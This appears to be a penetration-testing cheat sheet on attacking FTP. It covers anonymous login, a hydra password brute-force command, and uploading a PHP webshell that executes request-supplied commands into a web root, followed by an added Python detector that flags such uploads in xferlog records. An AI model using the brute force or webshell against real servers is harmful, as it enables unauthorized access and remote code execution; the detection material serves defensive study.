Attacking FTP

Criteria

Log in to FTP using the following command. You will be prompted to enter a username and password.

ftp {IP}

Download a file from FTP using the following command.

get creds.txt

There is also the option to download multiple files.

mget *

Upload a file to FTP using the following command.

put hello.txt

There is also the option to upload multiple files.

mput *

To list files in FTP, use the following command.

dir

You can list hidden files with the following command.

dir -a

Attacks

Sometimes FTP servers may be misconfigured to allow for anonymous login.

ftp {IP}
>anonymous
>anonymous

Bruteforce FTP using the following command.

hydra -l root -P /usr/share/wordlists/rockyou.txt {IP} ftp

FTP to RCE

Description

If you have proper permissions, you may be able to upload a webshell via FTP and execute it on the website. This requires knowing the website's path, either from a path disclosure or by guessing.

Step 1 - Create a Webshell


    <?php 
        echo "Shelled";
        system($_REQUEST['cmd']);
    ?>

Step 2 - Upload Webshell to Webroot via FTP

ftp> put shell.php C:\\xampp\\htdocs\\shell.php
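
Detecting the upload from Steps 1 and 2 on the server side, as an added example that is not part of the original page: it scans xferlog-format transfer records for incoming script files written under a web root and notes whether the session was anonymous. The web-root prefixes, extension list and log lines are constructed assumptions.

```python
"""Flag FTP uploads of server-side scripts into a web root, from xferlog records."""
from dataclasses import dataclass

# Assumptions (not from the page): web-root fragments and script extensions to watch.
WEB_ROOTS = ("/var/www/", "/xampp/htdocs/")
SCRIPT_EXTS = (".php", ".phtml", ".jsp", ".asp", ".aspx")

# Constructed sample records in the standard xferlog field layout.
SAMPLE_LOG = """\
Mon Mar  3 10:15:02 2025 1 198.51.100.7 58 /var/www/html/shell.php b _ i r webadmin ftp 0 * c
Mon Mar  3 10:16:40 2025 1 198.51.100.7 2048 /home/webadmin/notes.txt b _ i r webadmin ftp 0 * c
Mon Mar  3 10:20:11 2025 2 203.0.113.9 91 /var/www/html/uploads/x.PHP b _ i a anon@example.test ftp 0 * c
Mon Mar  3 10:21:30 2025 1 203.0.113.9 512 /var/www/html/index.php b _ o a anon@example.test ftp 0 * c
truncated line
"""

@dataclass
class Finding:
    when: str
    host: str
    path: str
    user: str
    anonymous: bool

def parse_xferlog_line(line):
    """Return the fields needed for detection, or None if the record is malformed."""
    f = line.split()
    if len(f) < 18:  # 5 timestamp tokens + 13 xferlog fields
        return None
    return {"when": " ".join(f[0:5]), "host": f[6], "path": f[8],
            "direction": f[11], "access": f[12], "user": f[13]}

def find_webroot_script_uploads(log_text):
    """Return a Finding for every incoming transfer of a script into a web root."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_xferlog_line(line)
        if rec is None or rec["direction"] != "i":  # "i" = upload to the server
            continue
        # Normalise case and Windows separators before matching.
        norm = rec["path"].replace("\\", "/").lower()
        if norm.endswith(SCRIPT_EXTS) and any(root in norm for root in WEB_ROOTS):
            findings.append(Finding(rec["when"], rec["host"], rec["path"],
                                    rec["user"], rec["access"] == "a"))
    return findings

if __name__ == "__main__":
    for finding in find_webroot_script_uploads(SAMPLE_LOG):
        print(finding)
```
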